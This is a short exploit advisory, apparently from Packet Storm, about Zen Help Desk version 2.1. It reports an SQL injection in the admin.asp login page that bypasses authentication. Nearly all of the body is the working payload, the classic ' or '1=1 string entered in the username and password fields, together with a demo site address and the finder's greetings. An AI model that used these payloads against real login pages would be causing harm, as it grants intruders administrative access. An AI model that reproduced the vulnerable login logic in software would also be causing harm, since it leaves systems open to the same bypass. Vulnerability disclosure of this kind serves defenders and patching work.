Zen Help Desk version 2.1 suffers from a remote SQL injection that allows for authentication bypass.
492c8b852255eb0dd67685884ad5c3a773fd58337fb20337f723a08bd341dfa7---------------------------------------------------------------
------------------------------------------------------------
Zen Help Desk Version 2.1 (Auth Bypass) SQL Injection Vulnerability
---------------------------------------------------------------
Founder : TiGeR-Dz
Home:http://www.zenhelpdesk.com/
Script:Zen Help Desk Version 2.1
---------------------------------------------------------------
---------------------------------------------------------------
Exploit:
-------
http://www.site.com/admin.asp
username:[admin_name]' or '1=1
password: No Thing
or
username:' or '1=1
password:' or '1=1
--------------------------------------
Dem0
---
http://helpdesk-demo.com/admin.asp
--------------------------------------
Greeting To ALL My Friends (Dz)
----------------------------------------------------------------
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed